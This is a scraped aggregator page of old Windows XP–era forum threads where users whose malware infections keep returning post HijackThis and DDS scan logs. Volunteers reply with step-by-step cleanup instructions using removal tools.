manually update for free and use in a similar way to Ad-Aware SE Personal, Spybot S&D etc.1. After download, double click on the file to launch the... Read more

11 more replies
Relevance 49.2%

Hello
For many years a succeeded in keeping my computers safe - then, not even a month ago, something surfaced. A Virut thing after I visited an insecure site.
If this can help, a few days before I had for the first time in my pc life installed a downloader program called Flashget-
Well I tried at first to clean up with Spybot and Spyware Doctor (who had not by the way intercepted the hostile item). But the machine had still a strange behaviour so I downloaded some Linux based Rescue CD .iso files (Kaspersky, BitDefender, WebDoctor), burned the CDs and went on scanning without Windows. Those found a wealth of infections by Trojans as well as by the Virut thing, so I kept cleaning and cleaning (desinfecting and/or deleting that is) until nothing more was found.
I then restarted Windows, uninstalled Flashget and installed Avast antivirus. Unfortunately when using my browser I started to get redirected to a "stolnik.net" whatever search I did. Plus Avast began to show infections spreading in the system by a "W32.Vitro" virus. So I tried again with the rescue CDs - Kaspersky found a couple issues but nothing else - and Avast still claiming I have the W32.Vitro everywhere.
At this point I used the VirutCF removal tool by Norton, but to no avail - there is no Virut infection in the machine.
I was beginning to get nervous so I downloaded the Combofix tool, disabled all and every anti-virus and -spyware - as requested - and tried to start Combofix: nothing happens... Read more

Answer:They keep coming back

If you truley have Virut the only real alternative is to do a complete wipe and reinstall. See boopme's post here:http://www.bleepingcomputer.com/forums/ind...t&p=1260380That will help you determine if you have virut, and if you do, what you need to do.

13 more replies
Relevance 49.2%

I have a PC i believe is infected.
i have run Combofix, it appears to find something and reboot but i am unable to tell by the log what it found.
i think it is still infected because if i run CF again, it says it needs to reboot to continue.
 ComboFix.txt   29.88KB
  5 downloads
 ComboFix2.txt   30.15KB
  3 downloads
 ComboFix3.txt   26.11KB
  2 downloads
 ComboFix4.txt   29.75KB
  3 downloads

Answer:it keeps coming back

Hello cgtrott, I will be handling your log to help you get cleaned up. I apologize for the delay but the forum is very busy and as you can see the logs we ask for are very extensive and take a lot of time to investigate. Please subscribe to this topic. Click on the Watch Topic button, select Immediate Notification and click on proceed.Make sure Word Wrap in notepad is turned off. When copying and pasting logs paste them directly in the reply box only attach logs if asked to. Do not wrap logs in codebox or code tags. It makes it very difficult to read and analyze them. Please paste them directly into the reply box. Do not make any changes to your system until we are through. Fixes are based upon information that is current from your system so any changes can affect our strategy. Please refrain from running any tools we may use without specific instructions.If your operating system is Windows Vista or Windows 7 it may be necessary to right click then choose Run as Administrator any programs we use.Before we begin please check and follow the instructions on How to Show Hidden Files and Folders in Windows Vista and Windows XP and How to show hidden files in Windows 7Because the e-mail notification system is not completely reliable, please check your topic once a day for responses.Please read carefully all directions and instructions. If you are instructed to save a tool to the desktop please save it to the desktop. If you have since resolved the original problem you were ha... Read more

2 more replies
Relevance 49.2%

I've run Ad-awareSE, Trend Micro's housecall, and McAfee. I've also run Ad-aware while in safemode yet I still keep getting these popups and McAfee keeps telling me that " The file C:\\WINDOWS\system32\winupdt.exe was infected by the Downloader-LG trojan and has been deleted to complete the cleaning process. Its' says it repeatedly then stops then a few hours later it'll come back. Here is my Hijack This log:
Logfile of HijackThis v1.99.1
Scan saved at 6:07:30 PM, on 3/15/2005
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\LEXBCES.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\LEXPPS.EXE
C:\WINDOWS\system32\rundll32.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\wkogyo.exe
C:\Program Files\Common Files\AOL\ACS\AOLAcsd.exe
C:\Program Files\Common Files\AOL\TopSpeed\2.0\aoltsmon.exe
c:\PROGRA~1\mcafee.com\vso\mcvsrte.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\WINDOWS\system32\nvsvc32.exe
C:\WINDOWS\System32\svchost.exe
c:\PROGRA~1\mcafee.com\vso\mcshield.exe
C:\WINDOWS\Mixer.exe
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\Program Files\Java\j2re1.4.2_06\bin\jusched.exe
C:\Program Files\Common Files\AOL\ACS\AOLDial.exe
C:... Read more

Answer:They just keep coming back...

16 more replies
Relevance 49.2%

I have a problem with pop-up ads that keep on appearing randomly on my computer. I tried using adaware which picked up a lot of them, but they keep coming back later.

Hijack this log (Created with Hijack-this Analyzer)

====================================================================
Log was analyzed using KRC HijackThis Analyzer - Updated on 4/1/05
Get updates at http://www.greyknight17.com/download.htm#programs

***Security Programs Detected***

C:\Program Files\Common Files\Symantec Shared\ccSetMgr.exe
C:\Program Files\Symantec AntiVirus\DefWatch.exe
C:\Program Files\Symantec AntiVirus\Rtvscan.exe
C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
C:\PROGRA~1\mcafee.com\agent\mcagent.exe
C:\Program Files\Common Files\Symantec Shared\ccApp.exe
C:\PROGRA~1\SYMANT~1\VPTray.exe
O4 - HKLM\..\Run: [MCAgentExe] c:\PROGRA~1\mcafee.com\agent\mcagent.exe
O4 - HKLM\..\Run: [MCUpdateExe] C:\PROGRA~1\mcafee.com\agent\mcupdate.exe
O4 - HKLM\..\Run: [ccApp] "C:\Program Files\Common Files\Symantec Shared\ccApp.exe"
O4 - HKLM\..\Run: [vptray] C:\PROGRA~1\SYMANT~1\VPTray.exe
O23 - Service: Symantec Event Manager (ccEvtMgr) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
O23 - Service: Symantec Password Validation (ccPwdSvc) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccPwdSvc.exe
O23 - Service: Symantec Settings Manager (ccSetMgr) - Symantec Corporation - C:\Program Files\Common Fil... Read more

Answer:Pop-Ups that keep coming back

Hi and welcome to TSF.

I am currently reviewing your log. Please note that this is under the supervision of an expert analyst, and I will be back with a fix for your problem a.s.a.p

Please be patient with me during this time.

4 more replies
Relevance 49.2%

Can't seem to get rid of the trusted zones, option is disabled in internet tools. I've run spybot, adware and avast but they still show.

Logfile of HijackThis v1.99.0
Scan saved at 10:18:03 AM, on 2/4/2005
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\LEXBCES.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\LEXPPS.EXE
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\QuickTime\qttask.exe
C:\Program Files\Real\RealPlayer\RealPlay.exe
C:\Program Files\Lexmark X6100 Series\lxbfbmgr.exe
C:\Program Files\Zone Labs\ZoneAlarm\zlclient.exe
C:\PROGRA~1\COMMON~1\AOL\ACS\acsd.exe
C:\Program Files\Lexmark X6100 Series\lxbfbmon.exe
C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
C:\Program Files\America Online 9.0\aoltray.exe
C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe
C:\Program Files\Microsoft Office\OFFICE11\ONENOTEM.EXE
C:\Program Files\Alwil Software\Avast4\ashServ.exe
C:\Program Files\Microsoft SQL Server\MSSQL$MICROSOFTBCM\Binn\sqlservr.exe
C:\Program Files\Analog Devices\SoundMAX\SMAgent.... Read more

Answer:they keep coming back!

Please print out or copy this page to Notepad. Make sure to work through the fixes in the exact order it is mentioned below. If there's anything that you don't understand, ask your question(s) before proceeding with the fixes. You should not have any open browsers when you are following the procedures below.

Go to My Computer->Tools/View->Folder Options->View tab and make sure that 'Show hidden files and folders' (or 'Show all files') is enabled. Also make sure that Display the contents of System Folders' is checked. Windows XP's search feature is a little different. When you click on 'All files and folders' on the left pane, click on the 'More advanced options' at the bottom. Make sure that Search system folders, Search hidden files and folders, and Search subfolders are checked.

For the options that you checked/enabled earlier, you may uncheck them after your log is clean. If we ask you to fix a program that you use or want to keep, please post back saying that (we don't know every program that exists, so we may tell you to delete a program that we think is bad to keep).

Turn off system restore by right clicking on My Computer and go to Properties->System Restore and check the box for Turn off System Restore. Click Apply and then OK. Restart your computer. After we are finished with your log file and verified that it's clean, you may turn it back on and create a new restore point.

Right click on this link http://www.greyknight17.com/spy/De... Read more

3 more replies
Relevance 49.2%

Hey everyone this is the first time I have posted anything but i am having some serious problems. I let my brother borrow my laptop and when i got it back it was infected bad.
I have pc-cillin, Malwarebytes, and SuperAnti-Spyware.
SuperAnti-Spyware seems to clean everything after i scan and reboot but there are two things that keep coming back on the next re-boot.
1. Pc-cillin keeps giving me a waring telling me to close the browser when its not open with the web address of 110/rjsa/select.php?a=6707a0a cd82d9318fa98c6ee396eed8e61fcf4200553e0c95d8b1d81bbda3c1b&b=1001&c=1
2. There is a sys32 file that gets deleted and always comes back on reboot its MoIXWA40.dll
Pc-Cillin tells me this is a trojan.bho and says its will delete on reboot.
please help me this is so frustrating it slows everything down sooo slow.
 

Answer:Pop-Ups keep coming back

Hi, Welcome to TSG!!
Click here to download HJTInstall.exe

Save HJTInstall.exe to your desktop.
Doubleclick on the HJTInstall.exe icon on your desktop.
By default it will install to C:\Program Files\Trend Micro\HijackThis .
Click on Install.
It will create a HijackThis icon on the desktop.
Once installed, it will launch Hijackthis.
Click on the Do a system scan and save a logfile button. It will scan and the log should open in notepad.
Click on "Edit > Select All" then click on "Edit > Copy" to copy the entire contents of the log.
Come back here to this thread and Paste the log in your next reply.
DO NOT have Hijackthis fix anything yet. Most of what it finds will be harmless or even required.

 

1 more replies
Relevance 49.2%
Question: keeps coming back

I keep running scans and it cleans the computer sometimes. I will encounter xp antispyware 2009 and 2008 telling me that my computer is infected. It posts a permanent box on my desktop saying infected and keeps popping up at bottom right by time clock saying infected. I will run anti malwarebytes and it will clean it only if i do quick scan. But then i will run full scan and it freezes so i know it is still infected. And sure enough a few days later it is all back. Please help. I also run cc cleaner and norton but norton freezes too. I have also tried in safemode but still freezes. Thanks Any and all help is greatly appreciated.

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 5:56:21 PM, on 10/8/2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Intel\Wireless\Bin\EvtEng.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Intel\Wireless\Bin\S24EvMon.exe
C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
C:\Program Files\Lavasoft\Ad-Aware 2007\aawservice.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Common Files\AOL\ACS\AOLAcsd.exe
C:\Program Files\Common Files\AOL\TopSpeed\2.0\aoltsmon.exe
C:\WINDOWS\eHome\ehRecvr.exe
C:\WINDOWS\eHome\ehSched.exe
C:\Program Files\Intel\Inte... Read more

Answer:keeps coming back

bump
 

2 more replies
Relevance 49.2%
Question: Back coming off?

My Lumia 640 is quite new and the back plastic panel writing logo is coming off the Microsoft logo has come off and some letters are coming away?
Is this normal?

More replies
Relevance 49.2%

Here is my dilemna:

I've run Kazaabegone, CWShredder, Spybot and Adware with new updates and reboots in between. I've run Hijack This and removed what I knew to be suspicious files in safe mode. But one:

O10 - Hijacked Internet access by New.Net
O10 - Hijacked Internet access by New.Net
O10 - Hijacked Internet access by New.Net
O10 - Hijacked Internet access by New.Net

keeps reappearing on the HJT log after rebooting. I know I'm missing something; just don't know what.

Here is the entire log:

Logfile of HijackThis v1.97.7
Scan saved at 8:04:28 PM, on 2/1/2004
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\cisvc.exe
c:\PROGRA~1\mcafee.com\vso\mcvsrte.exe
C:\PROGRA~1\McAfee.com\PERSON~1\MPFSERVICE.exe
C:\WINDOWS\wanmpsvc.exe
c:\PROGRA~1\mcafee.com\vso\mcshield.exe
C:\PROGRA~1\McAfee.com\PERSON~1\MpfAgent.exe
c:\program files\mcafee.com\agent\mcagent.exe
C:\WINDOWS\System32\hkcmd.exe
C:\Program Files\MUSICMATCH\MUSICMATCH Jukebox\mm_tray.exe
C:\Program Files\Roxio\Easy CD Creator 5\DirectCD\DirectCD.exe
C:\PROGRA~1\mcafee.com\vso\mcvsshld.exe
C:\Program Files\Common Files\Dell\EUSW\Support.exe
C:\Program Files\EarthLink 5.0\Con... Read more

Answer:New.net keeps coming back

6 more replies
Relevance 49.2%

hi, i hope somebody can help me. I'm running windows 95 b with internet explorer 5.5 and I keep getting "Error loading C:\WINDOWS\TEMP\se.dll". when I run IE, avg detects trojan horse startpage 16.bd and my start page is now advertising called "about: blank" I've deleted se.dll but it just keeps coming back. I'd appreciate any suggestions. thanx!
 

Answer:se.dll keeps coming back!

it sounds like you got hijacked. this should have been posted on the spyware specific board. follow the instructions on this link below.

http://forums.majorgeeks.com/showthread.php?t=35407 <--
Sticky: READ ME FIRST BEFORE ASKING FOR SUPPORT: Basic Spyware, Trojan And Virus Removal

g/l - sos
 

1 more replies
Relevance 49.2%

Oh God help me... these anti-spyware pop ups keeps popping up and i always run a check on ad-aware 6 and Spybot once i see it. But once i connect to the net and open a site, it all comes back again n i haf to scan it all over again.... help please this is real miserable...

Thank you.

Answer:It just keeps coming back...

try manually removing, on www.doxdesk.com there are listings for spyware/parasites.

you could also go to run > msconfig and deselect any programs starting up that you dont recoginse.

also try going to http://www.symantec.com/homecomputing/
at the bottom is a link to a free online virus check, you may have one that persistantly downloads spyware.

and finally ensure you have a firewall and if you have one make sure its up to date. www.download.com has a free copy of zonealarm, thats a good one

6 more replies
Relevance 49.2%

I think I may have finally scrubbed enough to keep the dll (IeBHOs.dll) from re-appearing, but the E2G folder keeps recreating itself. Any suggestions?

It's a friends system and had Norton on it. I installed NOD32 and PC Tools Spyware Doctor. Then read a few threads and ran HJT a few times and made some deletions that "may" have helped. I know that I managed to get rid of the TrojanDownLoader-AC2 but this E2G is stubborn.

Also ran SpySweeper many times in safe mode and in non-safe mode. Disables Spyware Doctor from auto load with windows as it seemed to be interefering with the Spy Sweeper scan.

Here's the latest HJT log:

Thanks in advance for any suggestions!

Charlie

Logfile of HijackThis v1.99.1
Scan saved at 6:51:15 PM, on 4/18/2006
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Common Files\Symantec Shared\ccSetMgr.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
C:\Program Files\Common Files\Symantec Shared\SNDSrvc.exe
C:\Program Files\Common Files\Symantec Shared\SPBBC\SPBBCSvc.exe
C:\Program Files\Common Files\Symantec Shared\CCPD-LC\symlcsvc.exe
C:\WINDOWS\system32\LEXBCES.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\LEXPPS.EX... Read more

Answer:E2G keeps coming back

16 more replies
Relevance 49.2%

I think I may have finally scrubbed enough to keep the dll (IeBHOs.dll) from re-appearing, but the E2G folder keeps recreating itself. Any suggestions?

It's a friends system and had Norton on it. I installed NOD32 and PC Tools Spyware Doctor. Then read a few threads and ran HJT a few times and made some deletions that "may" have helped. I know that I managed to get rid of the TrojanDownLoader-AC2 but this E2G is stubborn.

Also ran SpySweeper many times in safe mode and in non-safe mode. Disabled Spyware Doctor from auto load with windows as it seemed to be interefering with the Spy Sweeper scan.

Here's the latest HJT log:

Thanks in advance for any suggestions!

Charlie

Logfile of HijackThis v1.99.1
Scan saved at 6:51:15 PM, on 4/18/2006
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Common Files\Symantec Shared\ccSetMgr.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
C:\Program Files\Common Files\Symantec Shared\SNDSrvc.exe
C:\Program Files\Common Files\Symantec Shared\SPBBC\SPBBCSvc.exe
C:\Program Files\Common Files\Symantec Shared\CCPD-LC\symlcsvc.exe
C:\WINDOWS\system32\LEXBCES.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\LEXPPS.EX... Read more

Answer:E2G keeps coming back

Thread closed, please do not post duplicates!
Continue here: http://forums.techguy.org/security/460316-e2g-keeps-coming-back.html
 

1 more replies
Relevance 49.2%
Question: Keeps Coming Back

Can someone please help me with this problem? All my AV programs detect a virus running in my system, but whenver I have it removed, it keeps coming back How can I stop this???


HJT Log:

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 8:22:13 AM, on 8/25/2008
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\ESET\ESET NOD32 Antivirus\ekrn.exe
C:\Nexon\Mabinogi\npkcmsvc.exe
C:\WINDOWS\System32\nvsvc32.exe
C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe
C:\WINDOWS\explorer.exe
C:\Program Files\Yahoo!\Messenger\ymsgr_tray.exe
C:\WINDOWS\system32\csrcs.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\WINDOWS\system32\NOTEPAD.EXE
C:\Program Files\Spybot - Search & Destroy\SpybotSD.exe
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: Spybot-S&D IE Protection - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.... Read more

Answer:Keeps Coming Back

Hello and Welcome. Please subscribe to this thread to get immediate notification of replies as soon as they are posted. To do this click Thread Tools, then click Subscribe to this Thread. Make sure it is set to Instant Notification, then click Subscribe.

---------------------------------------------------------------------------------------------

If you still require assistance with this issue, please do this:
Download RSIT by random/random and save it to your desktop.
Double click RSIT.exe to start the tool and click Continue at the disclaimer.
When the scan completes it will open a log named log.txt maximized, and a log named info.txt minimized.
Copy (Ctrl+A then Ctrl+C) and paste (Ctrl+V) the contents of log.txt here.
Please attach info.txt to your post.
To attach a file to a new post, simplyClick the[Manage Attachments] button under Additional Options > Attach Files on the post composition page, and
copy and paste the following into the "Upload File from your Computer" box:C:\rsit\info.txt

Click Upload.

---------------------------------------------------------------------------------------------

2 more replies
Relevance 49.2%

I think I may have finally scrubbed enough to keep the dll (IeBHOs.dll) from re-appearing, but the E2G folder keeps recreating itself. Any suggestions?

It's a friends system and had Norton on it. I installed NOD32 and PC Tools Spyware Doctor. Then read a few threads and ran HJT a few times and made some deletions that "may" have helped. I know that I managed to get rid of the TrojanDownLoader-AC2 but this E2G is stubborn.

Also ran SpySweeper many times in safe mode and in non-safe mode. Disables Spyware Doctor from auto load with windows as it seemed to be interefering with the Spy Sweeper scan.

Here's the latest HJT log:

Thanks in advance for any suggestions!

Charlie

Logfile of HijackThis v1.99.1
Scan saved at 6:51:15 PM, on 4/18/2006
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Common Files\Symantec Shared\ccSetMgr.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
C:\Program Files\Common Files\Symantec Shared\SNDSrvc.exe
C:\Program Files\Common Files\Symantec Shared\SPBBC\SPBBCSvc.exe
C:\Program Files\Common Files\Symantec Shared\CCPD-LC\symlcsvc.exe
C:\WINDOWS\system32\LEXBCES.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\LEXPPS.EX... Read more

Answer:E2G keeps coming back

Three threads are not needed for the same problem.
 

2 more replies
Relevance 49.2%

windows securty 7 keeps coming bak after doing all the steps
 

Answer:it keeps coming back

Please attach the logs from both SUPERantispyware and MalwareBytes. Also run the below and attach the log.

I want you to run TDSSKiller so refer to the below for how to do so.

TDSSkiller - How to run
 

11 more replies
Relevance 49.2%

I uses Vundofix, ad-aware, spybot, xoft, avg, House call, Microtrend, Don't know what to do next? here is my infoLogfile of HijackThis v1.99.1Scan saved at 1:48:37 PM, on 3/22/2006Platform: Windows XP SP2 (WinNT 5.01.2600)MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)Running processes:C:\WINDOWS\System32\smss.exeC:\WINDOWS\system32\winlogon.exeC:\WINDOWS\system32\services.exeC:\WINDOWS\system32\lsass.exeC:\WINDOWS\system32\svchost.exeC:\WINDOWS\System32\svchost.exeC:\WINDOWS\system32\spoolsv.exeC:\Program Files\NavNT\defwatch.exeC:\Program Files\NavNT\rtvscan.exeC:\Program Files\Norton Utilities\NPROTECT.EXEC:\WINDOWS\Explorer.EXEC:\WINDOWS\System32\svchost.exeC:\Program Files\NavNT\vptray.exeC:\Program Files\BearShare\BearShare.exeC:\Program Files\ArcSoft\PhotoImpression 5\PI Monitor.exeC:\Program Files\Yahoo!\Messenger\ymsgr_tray.exeC:\WINDOWS\system32\wuauclt.exeC:\WINDOWS\system32\rundll32.exeC:\Program Files\Internet Explorer\iexplore.exeC:\Program Files\HijackThis\HijackThis.exeR1 - HKCU\Software\Microsoft\Internet Explorer,SearchURL = http://www.Begin2Search.com/search.htmlO4 - HKLM\..\Run: [vptray] C:\Program Files\NavNT\... Read more

Answer:Pop Up's Keep Coming Back

Hello Mhenry, Welcome to BleepingComputer!My name is Nick and I will be checking over your log.Let's get started.You will want to print or save these instructions.Please download Look2Me-Destroyer.exe to your desktop.Close all windows before continuing.Double-click Look2Me-Destroyer.exe to run it.Put a check next to Run this program as a task.You will receive a message saying Look2Me-Destroyer will close and re-open in approximately 1 minute. Click OKWhen Look2Me-Destroyer re-opens, click the Scan for L2M button, your desktop icons will disappear, this is normal.Once it's done scanning, click the Remove L2M button.You will receive a Done Scanning message, click OK.When completed, you will receive this message: Done removing infected files! Look2Me-Destroyer will now shutdown your computer, click OK.Your computer will then shutdown.Turn your computer back on.Please post the contents of Look2Me-Destroyer.txt (it can be found wherever you saved Look2Me-Destroyer.exe) and a new HiJackThis log.If Look2Me-Destroyer does not reopen automatically, reboot and try again.I highly suggest you get rid of BearShare. It is a P2P program which is usually the cause for malware.Read here for more information on clean and infected File Sharing Programs.Click Start> Control Panel > Add/Remove Programs and remove:BearSharePlease note any other programs that you dont recognize in that list in your next responseReboot your computer once more.Please go HERE to run Panda's ActiveScanOn... Read more

1 more replies
Relevance 49.2%

Hot bar I am told is a parasite.That is its a freeby thats seems frindly but in reality is sucking all your secrets.So last night I deleted all trace of it from the system by norton and by Regedit.Tonight it back......What sort of mallet this this need ?

Answer:hot bar keeps a coming back

Please post a HJT log click hereYou may need to post in in two halves because of the 800 word limit.Please double space it by adding a blank line after each line so that it is legible with the site's formatting.

4 more replies
Relevance 49.2%

Hi everyone,

i had this fake FBI Virus on a laptop couple days ago, it would not let the windows to boot, not even in safe mode. i got it to clean with kaspersky boot disc, and also scanned it with avg, malwarebytes, avast. send it back to customer, same night he called me saying avast kept picking up something but was not able to remove it! so i picked it up again the next day, scanned with avg & malwarebytes seemed to be cleaned up again, nothing was picking up any viruses. but guess what? this morning i have a text from a custoemr, saying he was locked up out of screen and he was able to get into it, but now avg is picking up something again!!! i asked him if he uses usb drive or external or anything but he said he did not use any of those! PLEASE HELP WITH REMOVAL OF THIS!!!!

Answer:It keeps coming back!!!!

Hello sapikest,
my name is Marius and I will be assisting you with your Malware related problems.

Before we move on, please read the following points carefully.
First, read my instructions completely. If there is anything that you do not understand kindly ask before proceeding.
Perform everything in the correct order. Sometimes one step requires the previous one.
If you have any problems while you are follow my instructions, Stop there and tell me the exact nature of your problem.
Do not run any other scans without instruction or Add/ Remove Software unless I tell you to do so. This would change the output of our tools and could be confusing for me.
Post all Logfiles as a reply rather than as an attachment unless I specifically ask you. If you can not post all logfiles in one reply, feel free to use more posts.
If I don't hear from you within 3 days from this initial or any subsequent post, then this thread will be closed.
Stay with me. I will give you some advice about prevention after the cleanup process. Absence of symptoms does not always mean the computer is clean.
My first language is not english. So please do not use slang or idioms. It could be hard for me to read. Thanks for your understanding.

Before we start, please note:

Please be advised that this free service is typically for home users. We'll help you out this time, but in the future if you are unable to clean a machine via standard methods, then either backup the client's data and rein... Read more

2 more replies
Relevance 49.2%

Everytime I run webroots spysweeper It finds a cws threat. I don't understand why it keeps popping up, even after I tell spysweeper to remove it. Someone want to help me....

Logfile of HijackThis v1.99.1
Scan saved at 7:44:30 PM, on 10/25/2005
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Eset\nod32krn.exe
C:\WINDOWS\System32\nvsvc32.exe
D:\programfiles\Spy Sweeper\Spy Sweeper\WRSSSDK.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\SOUNDMAN.EXE
C:\WINDOWS\system32\RUNDLL32.EXE
C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe
C:\Program Files\Logitech\iTouch\iTouch.exe
C:\Program Files\Eset\nod32kui.exe
D:\programfiles\Spy Sweeper\Spy Sweeper\SpySweeper.exe
C:\Program Files\Java\jre1.5.0_04\bin\jusched.exe
D:\programfiles\MicrosoftAntivirus\gcasServ.exe
C:\Program Files\QuickTime\qttask.exe
D:\programfiles\Spybot - Search & Destroy\TeaTimer.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\Program Files\Logitech\MouseWare\system\em_exec.exe
D:\programfiles\MicrosoftAntivirus\gcasDtServ.exe
C:\Program Files\LIUtilities\WinTasks\wintasks.exe
D:\programfiles\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = www.... Read more

Answer:CWS keeps coming back

8 more replies
Relevance 49.2%

This is my second attempt at help. I failed my first time and after reading the preparation guide here I am. I tried fixing it myself and loading MBAM and it says I have an infected regestry value, (Trojan.Agent) When I run the MBAM it says my computer must reboot to fix. It does, but then I have the same infection. I am confused, frustrated, and not really sure now what I am doing. Thankfully there are those here that can help...I am humbled.

Here is my DDS.txt
DDS (Ver_09-03-16.01) - NTFSx86
Run by Owner at 16:10:46.34 on Tue 03/31/2009
Internet Explorer: 7.0.5730.13
Microsoft Windows XP Home Edition 5.1.2600.3.1252.1.1033.18.511.186 [GMT -4:00]

AV: Avira AntiVir PersonalEdition *On-access scanning enabled* (Updated)

============== Running Processes ===============

C:\WINNT\system32\svchost -k DcomLaunch
svchost.exe
C:\WINNT\System32\svchost.exe -k netsvcs
C:\WINNT\system32\svchost.exe -k WudfServiceGroup
svchost.exe
C:\Program Files\Lavasoft\Ad-Aware\AAWService.exe
C:\WINNT\system32\spoolsv.exe
C:\Program Files\Avira\AntiVir PersonalEdition Classic\sched.exe
C:\WINNT\Explorer.EXE
C:\Program Files\Microsoft IntelliPoint\point32.exe
C:\WINNT\system32\ezSP_Px.exe
C:\Program Files\Avira\AntiVir PersonalEdition Classic\avgnt.exe
C:\Program Files\Lavasoft\Ad-Aware\AAWTray.exe
